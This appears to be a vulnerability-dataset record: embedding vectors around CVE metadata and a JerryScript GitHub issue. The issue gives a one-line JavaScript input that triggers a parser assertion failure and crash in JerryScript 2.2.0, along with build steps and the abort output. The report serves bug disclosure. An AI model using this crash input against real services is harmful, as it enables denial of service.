-0.004932573065161705, 0.022449908778071404, 0.000607173889875412, 0.01222519762814045, -0.0038015786558389664, 0.004334388300776482, -0.0007317957351915538, 0.007570469751954079, 0.018893487751483917, -0.017311401665210724, 0.005717077758163214, 0.01463101152330637, -0.004239593632519245, -0.0015665576793253422, -0.004586083348840475, -0.01736370287835598, 0.0112118786200881, -0.022972911596298218, -0.013545780442655087, -0.024751121178269386, -0.01778210513293743, 0.006805577781051397, 0.007550857029855251, 0.013297353871166706, -0.0040467362850904465, -0.003732934594154358, 0.005331362597644329, 0.00585109693929553, 0.0004919497878290713, 0.00014454089978244156, -0.0285298191010952, -0.013238515704870224, 0.03457050397992134, -0.007707758340984583, 0.03980053588747978, 0.014003408141434193, 0.011473380029201508, 0.010826163925230503, 0.0036806343123316765, 0.002696734620258212, 0.0001839704200392589, -0.011401467956602573, -0.004465139005333185, -0.007302430924028158, -0.021652327850461006, 0.0019089613342657685, 0.003138018539175391, -0.02014869451522827, 0.007426643744111061, -0.015925444662570953, 0.006446013227105141, 0.0033504886087030172, 0.01080001424998045, 0.0020854747854173183, -0.011205341666936874, -0.008217685855925083, 0.005936085246503353, 0.000824547081720084, 0.01382035668939352, 0.02412351779639721, 0.021809229627251625, 0.0007338387076742947, 0.018318183720111847, -0.017494453117251396, 0.009505581110715866, -0.009021803736686707, 0.017795180901885033, -0.006181242875754833, 0.01778210513293743, 0.006361025385558605, -0.001967799151316285, 0.006243349518626928, -0.02289446070790291, -0.01401648297905922, -0.01438258495181799, -0.006671558134257793, -0.006586570292711258, -0.018462009727954865, -0.02354821376502514, 0.019874118268489838, 0.01931189000606537, -0.00823729857802391, 0.015219390392303467, 0.00595242902636528, -0.0026771221309900284, 0.018854262307286263, 0.006566957570612431, 0.007910422049462795, 0.0042788190767169, -0.02371819131076336, -0.018867336213588715, -0.0038865667302161455, 0.0025774247478693724, -0.0199787188321352, 0.0026150154881179333, -0.00225054775364697, 0.003906179452314973, 0.022868311032652855, -0.005145043134689331, -0.0066846334375441074, 0.03870223090052605, 0.012990089133381844, -0.02324748784303665, 0.012009458616375923, 0.0005977762048132718, -0.0036969780921936035, 0.0034060575999319553, -0.006635601632297039, 0.002234203740954399, -0.016696874052286148, 0.006462357006967068, -0.01035546138882637, 0.009852070361375809, -0.008982578292489052, 0.009636332280933857, 0.0029778489843010902, 0.0022162257228046656, -0.010616962797939777, 0.0032132002525031567, -0.00037631706800311804, -0.024424243718385696, 0.0026705844793468714, 0.009113328531384468, 0.0049848733469843864, 0.008662238717079163, -0.006128942593932152, -0.002412351779639721, 0.011643356643617153, -0.010022046975791454, 0.01345425471663475, -0.02167847752571106, 0.005190805532038212, 0.005589595530182123, -0.00040798328700475395, -0.007367806043475866, 0.010257397778332233, -0.026450881734490395, -0.0067336647771298885, -0.009551344439387321, -0.0027392287738621235, -0.007047466933727264, -0.008819139562547207, -0.016369996592402458, -0.016853773966431618, 0.003291650675237179, 0.02511722408235073, -0.004693952854722738, 0.006498313508927822, 0.013794207014143467, 0.002825851086527109, -0.008747226558625698, 0.0028062385972589254, 0.0154939666390419, 0.010414299555122852, 0.005664777476340532, -0.020017944276332855, 0.034361302852630615, 0.006766352336853743, -0.001972702331840992, 0.0057464963756501675, 0.0004043059016112238, 0.001843585865572095, -0.005772646516561508, 0.02941892482340336, 0.0101854857057333, -0.03315839543938637, -0.01116611622273922, 0.013297353871166706, 0.007694683037698269, 0.022384531795978546, -0.0014529679901897907, 0.0244503952562809, 0.009276767261326313, -0.02486879751086235, -0.009204854257404804, 0.03797002509236336, -0.008060785010457039, 0.006079910788685083, -0.01276127528399229, 0.024973398074507713, -0.022528357803821564, 0.002340438775718212, -0.024398094043135643, -0.004550126846879721, 0.0029729458037763834, 0.02379664033651352, 0.031929340213537216, -0.004860660061240196, -0.0005201429012231529, 0.010662725195288658, -0.017507528886198997, 0.0076423827558755875, 0.004419376142323017, 0.02071092277765274, 0.0064198630861938, 0.008178461343050003, -0.007184755057096481, 0.026856208220124245, 0.012009458616375923, -0.009067566134035587, 0.013467329554259777, 0.017259102314710617, 0.019704140722751617, -0.009237541817128658, 0.005808603018522263, -0.012120597064495087, -0.01096345204859972, 0.004854122642427683, 0.006792502477765083, 0.012990089133381844, -0.004912960343062878, -0.014918663538992405, 0.0366886667907238, -0.002675487659871578, -0.011597593314945698, 0.014474110677838326, 0.0010966721456497908, 0.011133428663015366, -0.03985283523797989, 0.012754738330841064, -0.013441179879009724, -0.017062975093722343, -0.003667559241876006, -0.0063217999413609505, 0.005298675037920475, -0.022802935913205147, 0.02005716785788536, 0.0014170114882290363, -0.00747894449159503, -0.013977257534861565, -0.01357193011790514, -0.013401954434812069, 0.008714538998901844, -0.008335362188518047, -0.005612477194517851, -0.017298327758908272, -0.011381855234503746, -0.004576276987791061 ]
1,734
CVE-2020-23311
2021-06-10T23:15:07.943000
There is an Assertion 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' failed at js-parser-expr.c:3230 in parser_parse_object_initializer in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3822" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3822
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision d06c3a7 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` function f ({array, 'a', { value: 'foo', enumerable: true } : 36}) {} ``` ###### Output ``` ICE: Assertion 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' failed at /home/JerryScript/jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_object_initializer):3230. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` Credits: This vulnerability is detected by chong from OWL337.
Assertion 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' in parser_parse_object_initializer
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3822/comments
0
2020-06-01T03:10:23
2020-06-03T13:28:14Z
https://github.com/jerryscript-project/jerryscript/issues/3822
628,120,323
3,822
true
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Assertion 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' in parser_parse_object_initializer Issue date: --- start body --- ###### JerryScript revision d06c3a7 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` function f ({array, 'a', { value: 'foo', enumerable: true } : 36}) {} ``` ###### Output ``` ICE: Assertion 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' failed at /home/JerryScript/jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_object_initializer):3230. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` Credits: This vulnerability is detected by chong from OWL337. --- end body ---
1,162
[ -0.02049541100859642, 0.032891709357500076, -0.0011671604588627815, -0.0056919557973742485, 0.010844942182302475, -0.0143919438123703, -0.006657002493739128, 0.038252271711826324, -0.04774979129433632, 0.02036431059241295, 0.007778641767799854, -0.0009263539686799049, 0.029585059732198715, 0.0073562064208090305, -0.018878500908613205, 0.0395050123333931, -0.009759719483554363, 0.023306792601943016, -0.026118174195289612, -0.01780056208372116, -0.014523045159876347, 0.017480093985795975, -0.01308093685656786, 0.04431203752756119, 0.007228747475892305, 0.004180655814707279, 0.028215784579515457, -0.0005025527207180858, -0.018980469554662704, -0.02715241350233555, 0.016941124573349953, 0.00021190062398090959, -0.0064166514202952385, 0.005287728272378445, 0.05611110106110573, 0.01718875952064991, 0.04139868915081024, 0.040291618555784225, -0.027400048449635506, -0.009235316887497902, -0.028288619592785835, -0.04772065579891205, -0.03490192070603371, 0.0217918511480093, 0.017407260835170746, 0.04702145233750343, 0.04993480071425438, -0.0017143237637355924, -0.018732834607362747, 0.02039344236254692, 0.0111508434638381, -0.0022359953727573156, 0.038077473640441895, -0.04349629953503609, 0.03577592596411705, 0.011740796267986298, 0.00719597190618515, -0.005571779794991016, -0.0005444320850074291, 0.001646042219363153, -0.01140576135367155, 0.0009213466546498239, -0.015324216336011887, 0.014756113290786743, 0.01667892374098301, 0.06071419268846512, -0.007640257943421602, -0.004198864102363586, -0.0002688019594643265, 0.012592950835824013, 0.010131170973181725, -0.004151522181928158, 0.026992179453372955, 0.05290642008185387, 0.0157175175845623, -0.016649790108203888, 0.021602483466267586, 0.029890961945056915, -0.005804847925901413, -0.02288435585796833, -0.010029204189777374, 0.018936768174171448, -0.021529648452997208, 0.004177014343440533, -0.010422506369650364, 0.028740188106894493, -0.0037509368266910315, -0.06753142923116684, -0.014960046857595444, -0.017654895782470703, -0.033474382013082504, 0.04600178077816963, 0.00010196721268584952, -0.0043190401047468185, 0.015265949070453644, 0.01098332554101944, -0.010371522977948189, -0.004730550572276115, -0.02715241350233555, 0.024370165541768074, -0.023685527965426445, 0.020684778690338135, -0.0053205038420856, 0.026409508660435677, 0.006580526940524578, 0.0282740518450737, 0.02560833841562271, -0.0058303396217525005, 0.02418079786002636, 0.09783025830984116, -0.0033212178386747837, 0.027035878971219063, -0.02555007115006447, -0.005630047060549259, -0.0038092038594186306, 0.02789531648159027, 0.01721789315342903, -0.0204662773758173, -0.027268946170806885, 0.04678838700056076, -0.03979634866118431, -0.02766224928200245, 0.001629654667340219, -0.008310328237712383, -0.015936018899083138, 0.022796956822276115, 0.030706698074936867, -0.007028454449027777, 0.02110721357166767, -0.009803419932723045, -0.04533171281218529, -0.005324145313352346, 0.013845691457390785, -0.010662857443094254, 0.023000890389084816, 0.01072840765118599, -0.0037727870512753725, 0.036708198487758636, -0.035280656069517136, -0.0427679643034935, -0.03673733025789261, -0.026205575093626976, 0.04437030479311943, 0.013394122011959553, 0.008455995470285416, 0.012316183187067509, -0.019519438967108727, 0.011573279276490211, -0.014355527237057686, -0.009504801593720913, -0.0007802312611602247, 0.02120918035507202, 0.021194614470005035, 0.021121781319379807, 0.0456230454146862, 0.006001499015837908, 0.01557185035198927, 0.03539719060063362, 0.018121030181646347, 0.013270304538309574, -0.03440665081143379, -0.024064263328909874, -0.018776534125208855, 0.008062693290412426, -0.03997115045785904, 0.0075819906778633595, -0.0401168167591095, 0.0228115227073431, -0.0010078366613015532, 0.021952085196971893, -0.004555749706923962, 0.009235316887497902, 0.03431925177574158, 0.02265128865838051, -0.009679602459073067, -0.031638968735933304, 0.02718154713511467, 0.007472740486264229, -0.002893319819122553, -0.02217058651149273, 0.018354099243879318, 0.008354028686881065, -0.001854528789408505, -0.0051056439988315105, 0.006445784587413073, -0.04978913441300392, 0.023889461532235146, -0.06922117620706558, -0.0003022599557880312, -0.010240421630442142, 0.0021030737552791834, 0.016518689692020416, -0.0074654570780694485, -0.0071413470432162285, -0.012745901942253113, 0.015120281837880611, -0.022520188242197037, -0.05850004777312279, -0.015353349037468433, -0.025448104366660118, 0.06741489470005035, -0.0006118033197708428, -0.012563818134367466, -0.022359954193234444, -0.004213430918753147, -0.03137676790356636, -0.0037181617226451635, -0.01024770550429821, 0.030240563675761223, -0.005928665399551392, -0.014603162184357643, -0.01820843107998371, 0.032075971364974976, -0.036504264920949936, -0.01981077343225479, -0.003903887700289488, -0.00801170989871025, 0.014100609347224236, -0.009235316887497902, -0.011369344778358936, -0.014493911527097225, -0.017756862565875053, -0.027472881600260735, 0.013496089726686478, -0.032454706728458405, -0.02247648872435093, -0.023991430178284645, -0.005225820001214743, -0.053022950887680054, 0.03257124125957489, 0.012104964815080166, 0.015163981355726719, -0.00847784522920847, -0.0063948011957108974, 0.031114567071199417, 0.013940375298261642, -0.03694126754999161, -0.03242557495832443, -0.006143524777144194, 0.022636722773313522, -0.010021920315921307, -0.011995715089142323, -0.05281901732087135, -0.01780056208372116, -0.008579812943935394, 0.023525293916463852, -0.032833442091941833, -0.030473630875349045, -0.025215035304427147, 0.03254210948944092, -0.0030826875008642673, -0.043292365968227386, -0.022447355091571808, -0.016285620629787445, -0.022767823189496994, 0.009635902009904385, 0.007290655747056007, 0.01519311498850584, 0.007793208584189415, -0.0225056204944849, 0.020888712257146835, 0.01845606602728367, -0.007640257943421602, -0.01378014124929905, 0.011988431215286255, 0.00023329553368967026, -0.027225246652960777, -0.03472711890935898, -0.027065012603998184, -0.039650678634643555, 0.060830727219581604, -0.03778613731265068, 0.006525901611894369, -0.004745117388665676, -0.01817929744720459, 0.011354777961969376, 0.0036252986174076796, 0.023335926234722137, -0.02506936900317669, -0.025142202153801918, 0.006758969742804766, 0.030065761879086494, 0.014508478343486786, 0.016664355993270874, 0.034668851643800735, 0.011507729068398476, 0.01828126609325409, -0.00784419197589159, -0.01855803281068802, -0.02789531648159027, -0.025054801255464554, -0.01453032810240984, 0.0006463993340730667, 0.005065585486590862, 0.00010179651144426316, 0.015032880939543247, 0.02547723799943924, -0.05995672196149826, -0.006274625658988953, 0.008397728204727173, -0.00759655749425292, -0.03615466132760048, -0.005841264966875315, -0.012134098447859287, -0.046467918902635574, 0.009679602459073067, 0.01708679273724556, 0.01507658138871193, -0.009665035642683506, -0.0217918511480093, 0.02865278720855713, -0.023073723539710045, 0.005145702511072159, -0.009395550936460495, -0.020888712257146835, 0.008572529070079327, 0.023146558552980423, -0.03423185274004936, -0.020670210942626, 0.02919175662100315, -0.042068760842084885, -0.03635859489440918, -0.037465669214725494, 0.025826839730143547, 0.04774979129433632, -0.005517154932022095, -0.0223016869276762, 0.004570316523313522, -0.03417358547449112, -0.037465669214725494, 0.0017143237637355924, -0.035484589636325836, -0.051653679460287094, -0.0015213144943118095, -0.025928806513547897, -0.044661641120910645, -0.031260233372449875, 0.03396964818239212, 0.00041446942486800253, -0.0423600934445858, -0.005903173703700304, -0.01586318574845791, -0.027443747967481613, 0.0024909134954214096, 0.013707307167351246, -0.019038736820220947, 0.031056299805641174, 0.008499695919454098, 0.04104908928275108, -0.0018882143776863813, 0.0008020814275369048, -0.0027148770168423653, 0.01229433249682188, -0.01667892374098301, 0.039912883192300797, -0.04920646548271179, -0.024137096479535103, -0.02448669821023941, 0.03903887793421745, 0.0077349417842924595, -0.030124029144644737, -0.034260984510183334, 0.022928057238459587, -0.021223748102784157, 0.021806417033076286, -0.01335042156279087, 0.015746651217341423, 0.014559461735188961, -0.0032939051743596792, -0.03312477841973305, -0.048041123896837234, 0.0023652752861380577, -0.003765503643080592, -0.022330820560455322, -0.010437073186039925, -0.04696318507194519, 0.008171943947672844, -0.00007602020195918158, -0.02359812706708908, 0.02090328000485897, -0.020728478208184242, -0.01729072630405426, 0.04183569177985191, -0.030531898140907288, 0.022826090455055237, 0.008033559657633305, -0.026424076408147812, 0.008375878445804119, 0.013394122011959553, 0.0007119496585801244, -0.029395692050457, 0.04675925150513649, -0.031901173293590546, -0.0581795796751976, -0.023248525336384773, 0.019650539383292198, -0.03385311737656593, -0.03694126754999161, -0.01193744782358408, -0.009118782356381416, -0.005447962787002325, -0.020451709628105164, 0.01810646429657936, -0.03332871198654175, 0.010342389345169067, 0.018543466925621033, -0.0160234197974205, -0.022738689556717873, 0.026045341044664383, 0.029410257935523987, 0.026307541877031326, -0.0035378981847316027, -0.011638829484581947, 0.01691199094057083, 0.06030632555484772, 0.02466150000691414, 0.03201770409941673, -0.027035878971219063, -0.037698738276958466, 0.02029147557914257, 0.007946159690618515, -0.01975250616669655, 0.013984075747430325, 0.01164611242711544, 0.021019812673330307, -0.024472132325172424, -0.02977442741394043, 0.03018229641020298, 0.015353349037468433, 0.006321967579424381, -0.027035878971219063, 0.0014976435340940952, 0.017203325405716896, 0.025841405615210533, 0.0051602693274617195, -0.03542632609605789, -0.04390417039394379, -0.03461058810353279, -0.010305971838533878, 0.00983983650803566, 0.048303328454494476, -0.011420328170061111, -0.04809939116239548, -0.013496089726686478, 0.021136347204446793, -0.023685527965426445, -0.04809939116239548, 0.00379463704302907, -0.036708198487758636, 0.022054051980376244, -0.006850012112408876, 0.022593021392822266, -0.0223016869276762, 0.015950586646795273, -0.0006436680560000241, -0.0006486753700301051, 0.010735691525042057, -0.001824484788812697, -0.0318429060280323, -0.00012734522169921547, -0.018252132460474968, 0.0010815808782353997, -0.010932342149317265, 0.007108571473509073, -0.03933021053671837, 0.009526651352643967, 0.014326393604278564, -0.026074474677443504, -0.00029361096676439047, -0.030124029144644737, 0.0069556208327412605, -0.02107807993888855, 0.001629654667340219, 0.02400599606335163, -0.014217142947018147, -0.004610375035554171, -0.005855831783264875, -0.00524402828887105, -0.011223677545785904, -0.020349742844700813, 0.010976042598485947, -0.015032880939543247, -0.014493911527097225, 0.043700236827135086, 0.017756862565875053, 0.003017137059941888, 0.020014706999063492, 0.00823749415576458, 0.01769859530031681, 0.029861828312277794, 0.028434285894036293, 0.004191580694168806, -0.03236730769276619, -0.026613444089889526, 0.001555000082589686, 0.003980363253504038, -0.01519311498850584, -0.0011280123144388199, 0.03539719060063362, 0.02339419350028038, 0.024909134954214096, -0.033095646649599075, 0.026642577722668648, 0.02994922734797001, 0.012862435542047024, -0.022083185613155365, -0.05648983642458916, 0.022840656340122223, 0.012505550868809223, -0.006249133497476578, -0.009788853116333485, -0.0991121307015419, 0.027647681534290314, -0.0272543802857399, 0.008084543980658054, -0.024748900905251503, 0.009745152667164803, 0.011005176231265068, 0.030677564442157745, 0.01098332554101944, -0.02997836098074913, -0.041078221052885056, -0.02305915765464306, 0.030648432672023773, 0.03423185274004936, 0.022112319245934486, 0.022024918347597122, -0.017305294051766396, -0.028798455372452736, -0.03557199239730835, -0.027196113020181656, 0.024836299940943718, -0.011653396300971508, 0.029759859666228294, 0.01685372367501259, 0.0036853866185992956, -0.03181377053260803, 0.036038126796483994, -0.004770609084516764, -0.011493162252008915, 0.027021313086152077, 0.023627260699868202, -0.032833442091941833, -0.012461850419640541, 0.012862435542047024, 0.011092576198279858, -0.023306792601943016, 0.013998642563819885, 0.017887962982058525, 0.033649180084466934, -0.021602483466267586, -0.021544216200709343, -0.012775035575032234, 0.012847869656980038, -0.011413045227527618, -0.021398548036813736, -0.0285799540579319, 0.04614744707942009, 0.007968009449541569, -0.028419720008969307, -0.0005166642367839813, -0.021573349833488464, -0.005732014309614897, -0.00992723647505045, -0.010444356128573418, -0.0006705254781991243, -0.01947573758661747, 0.012338032945990562, 0.0010533577296882868, 0.03385311737656593, 0.017043091356754303, -0.007975293323397636, 0.015324216336011887, 0.004286264535039663, -0.015557283535599709, 0.013721873983740807, -0.003219250589609146, -0.0034104392398148775, -0.02844885364174843, -0.01008018758147955, 0.00630011735484004, -0.008157377131283283, -0.0019046019297093153, 0.004573957994580269, -0.005724730901420116, -0.01374372374266386, 0.016562389209866524, -0.0035160481929779053, 0.005458887666463852, -0.03242557495832443, -0.0211800467222929, -0.0048907846212387085, -0.006427576299756765, -0.006398442666977644, 0.013263021595776081, 0.010691991075873375, -0.00799714308232069, 0.007516440469771624, 0.026861077174544334, 0.0030153163243085146, -0.004013138357549906, -0.009067798964679241, 0.012316183187067509, 0.0017853367608040571, -0.02865278720855713, 0.031901173293590546, -0.0143919438123703, -0.004898068029433489, -0.002316112397238612, 0.023860327899456024, 0.010291405022144318, 0.012505550868809223, 0.028769321739673615, -0.03059016540646553, -0.005684672389179468, 0.01234531681984663, -0.007909742183983326, 0.026861077174544334, -0.00622364180162549, 0.02370009385049343, 0.016256486997008324, -0.028157519176602364, -0.02100524678826332, -0.009526651352643967, -0.002068477915599942, 0.0318429060280323, -0.033066511154174805, -0.01019672118127346, -0.01164611242711544, -0.03877667710185051, -0.017232459038496017, 0.007640257943421602, -0.020072974264621735, -0.011464028619229794, 0.009126066230237484, 0.044282905757427216, 0.01282601896673441, 0.02761854976415634, -0.001992002362385392, -0.03251297399401665, -0.00943196751177311, 0.006121674552559853, -0.01815016381442547, -0.014843513257801533, -0.011099860072135925, 0.0006463993340730667, 0.0025200468953698874, 0.007574707269668579, 0.015338782221078873, 0.019286369904875755, -0.03431925177574158, -0.012083115056157112, 0.04670098423957825, 0.018164731562137604, 0.01841236650943756, -0.0035688525531440973, 0.01729072630405426, 0.04879859462380409, -0.017436394467949867, -0.025637472048401833, -0.03230904042720795, -0.02265128865838051, -0.02018950879573822, 0.01640215516090393, 0.014173443429172039, -0.02305915765464306, -0.023991430178284645, 0.030444497242569923, -0.001257292227819562, 0.00958491861820221, -0.012920702807605267, -0.006613302510231733, 0.007560140918940306, 0.005163911264389753, 0.007611124310642481, -0.014734262600541115, -0.03702866658568382, 0.006314684171229601, -0.012418149970471859, -0.001581402262672782, -0.011507729068398476, -0.0036999532021582127, 0.023831194266676903, 0.017436394467949867, 0.012017564848065376, -0.013758290559053421, -0.0014093326171860099, 0.023102857172489166, 0.007545574102550745, -0.02598707377910614, -0.016751756891608238, 0.016285620629787445, 0.023408759385347366, 0.00030362559482455254, 0.005375129170715809, -0.00258377636782825, 0.04142782464623451, -0.017654895782470703, -0.0214859489351511, -0.04221442714333534, -0.01807733066380024, -0.003241100814193487, -0.02578313834965229, 0.007363489829003811, 0.018907634541392326, 0.02994922734797001, 0.010859508067369461, -0.019126135855913162, 0.010968758724629879, 0.01861630007624626, -0.0035688525531440973, 0.03134763613343239, -0.003674461506307125, -0.005753864534199238, 0.013314004987478256, -0.0302114300429821, -0.004020421765744686, 0.007632974535226822, -0.009774286299943924, 0.019592272117733955, -0.011274660937488079, -0.023306792601943016, -0.042068760842084885, -0.031289368867874146, 0.022534754127264023, -0.037902671843767166, -0.011777213774621487, 0.0282740518450737, 0.012308899313211441, 0.016547823324799538, -0.04530257731676102, -0.006729836110025644, -0.014894496649503708, 0.004858009517192841, -0.03000749461352825, 0.009868970140814781, 0.009847119450569153, 0.006562318652868271, 0.010691991075873375, 0.013903958722949028, 0.00985440332442522, 0.005171194672584534, 0.007236030884087086, -0.03018229641020298, -0.00008273455750895664, -0.009315433911979198, -0.01906786859035492, -0.018426932394504547, -0.009075081907212734, 0.014297259971499443, 0.028871288523077965, 0.011464028619229794, 0.0009823448490351439, 0.004592166282236576, 0.002785889897495508, 0.015324216336011887, 0.028084684163331985, -0.0066642859019339085, -0.017611194401979446, 0.014355527237057686, 0.013714590109884739, 0.011493162252008915, -0.013634473085403442, 0.011238244362175465, -0.001609625294804573, -0.01780056208372116, 0.05241115018725395, -0.011056159622967243, -0.0009281748207286, 0.019140703603625298, -0.005091077648103237, 0.009322716854512691, -0.005109285935759544, 0.0009240778745152056, 0.0027203396894037724, -0.02646777592599392, -0.01169709675014019, 0.03490192070603371, -0.006573243532329798, 0.012396300211548805, -0.03903887793421745, -0.006846370175480843, -0.010997892357409, 0.0028987822588533163, 0.01284058578312397, 0.015149414539337158, 0.002982540987432003, -0.01202484779059887, 0.020378876477479935, 0.0026602519210428, -0.037436533719301224, -0.043875034898519516, 0.018237564712762833, 0.003998571541160345, 0.0064712767489254475, -0.039475880563259125, -0.01667892374098301, 0.009228033013641834, 0.023525293916463852, -0.032105106860399246, 0.01510571502149105, 0.013539789244532585, 0.00890028104186058, -0.008448712527751923, 0.0011890105670318007, -0.01445749495178461, 0.0005071047926321626, -0.017684029415249825, -0.003954871091991663, 0.021981218829751015, 0.010342389345169067, -0.02158791571855545, -0.000046203895180951804, -0.006391159258782864, -0.0033376053906977177, 0.010626440867781639, -0.0019756148103624582, -0.022563887760043144, 0.014989180490374565, 0.019694238901138306, 0.010174871422350407, 0.006026990711688995, 0.010284122079610825, 0.003962154500186443, -0.007236030884087086, 0.012541967444121838, 0.028521686792373657, -0.008273911662399769, 0.01619821973145008, -0.0035925235133618116, -0.02138398215174675, -0.016824590042233467, -0.005699239205569029, 0.005145702511072159, -0.06327793747186661, 0.01866000145673752, 0.001674265251494944, 0.012847869656980038, -0.018470633774995804, 0.031464170664548874, 0.0037727870512753725, -0.005586346611380577, -0.011981148272752762, 0.01026227232068777, -0.004796100780367851, -0.019111569970846176, -0.012505550868809223, 0.025185901671648026, 0.00001510730817244621, 0.003270234214141965, 0.033678315579891205, 0.04061208665370941, -0.024850867688655853, 0.033270444720983505, -0.0012354421196505427, -0.0005171194788999856, -0.008346744813024998, -0.008259344846010208, 0.007374414708465338, -0.01619821973145008, 0.00701752956956625, 0.02090328000485897, 0.0035360774490982294, -0.0009008621564134955, 0.015455316752195358, -0.007487306836992502, -0.004464707337319851, -0.06968730688095093, -0.02555007115006447, -0.014501194469630718, -0.01906786859035492, 0.007199613843113184, 0.03076496534049511, 0.011806347407400608, -0.00037645932752639055, 0.016518689692020416, -0.004122389014810324, -0.018252132460474968, -0.016343887895345688, 0.008201077580451965, 0.011522295884788036, 0.0026129100006073713, -0.02390402927994728, -0.016839157789945602, 0.015455316752195358, 0.0054297540336847305, 0.026555176824331284, -0.022083185613155365, 0.0071413470432162285, -0.000727882026694715, -0.0010433431016281247, 0.01380927488207817, -0.027778783813118935, -0.030648432672023773, 0.016241921111941338, 0.020378876477479935, -0.020917845889925957, 0.002392587950453162, -0.0006768984603695571, 0.014930914156138897, -0.002962511731311679, -0.025491803884506226, -0.010444356128573418, -0.01685372367501259, 0.007072154898196459, 0.012250632978975773, 0.039068009704351425, 0.019635971635580063, -0.021500516682863235, 0.014180726371705532, 0.010808524675667286, 0.012541967444121838, -0.006828161887824535, -0.022228853777050972, 0.014238993637263775, 0.009672318585216999, -0.038281407207250595, -0.0035196898970752954, 0.003272055182605982, 0.04973086714744568, -0.0023652752861380577, -0.0010515368776395917, -0.03297911211848259, -0.0036507905460894108, 0.01609625294804573, -0.019257236272096634, -0.022724121809005737, -0.018091898411512375, -0.013102787546813488, 0.02868192084133625, -0.0060925413854420185, -0.0036762822419404984, 0.02115091308951378, -0.0012582025956362486, 0.033503513783216476, 0.008018992841243744, 0.018528899177908897, -0.009978220798075199, -0.012272482737898827, -0.05861658230423927, -0.0006523170741274953, 0.002509121783077717, 0.01008018758147955, -0.0021868327166885138, -0.016970258206129074, 0.014086042530834675, 0.01205398142337799, -0.014945480972528458, 0.02168988436460495, 0.024617798626422882, -0.021602483466267586, -0.022359954193234444, -0.0047815339639782906, -0.010531757026910782, -0.004140597302466631, 0.030910633504390717, -0.014763396233320236, 0.010480772703886032, -0.030619299039244652, 0.01589231938123703, -0.00855796318501234, 0.007771358359605074, -0.012381733395159245, -0.02234538644552231, -0.023889461532235146, 0.03463971987366676, -0.03297911211848259, 0.0231174249202013, 0.009395550936460495, -0.024748900905251503, 0.00023739242169540375, 0.026322107762098312, -0.0038966042920947075, 0.03195944055914879, -0.016343887895345688, 0.020932413637638092, 0.02670084312558174, -0.030094895511865616, -0.013889391906559467, 0.0023379626218229532, -0.015163981355726719, -0.01828126609325409, 0.009825269691646099, -0.013838407583534718, -0.0041442387737333775, -0.027196113020181656, 0.011587846092879772, 0.01729072630405426, -0.02349616028368473, 0.03137676790356636, -0.002547359559684992, -0.014734262600541115, -0.0075819906778633595, -0.020757611840963364, -0.011573279276490211, 0.010706557892262936, 0.0013364988844841719, -0.005440679378807545, 0.004985468462109566, -0.022738689556717873, -0.03758220374584198, 0.023918595165014267, 0.027123279869556427, 0.033270444720983505, -0.023889461532235146, 0.013962225057184696, -0.007290655747056007, -0.012440000660717487, -0.009526651352643967, -0.008805597200989723, -0.012920702807605267, -0.011609695851802826, 0.02601620741188526, -0.02227255329489708, 0.02980356104671955, -0.010415222495794296, -0.021471383050084114, 0.05710164085030556, 0.035659391433000565, 0.02885672263801098, -0.03997115045785904, -0.03440665081143379, 0.03257124125957489, -0.02636580914258957, -0.012403583154082298, 0.0033376053906977177, -0.008863864466547966, -0.0012636651517823339, 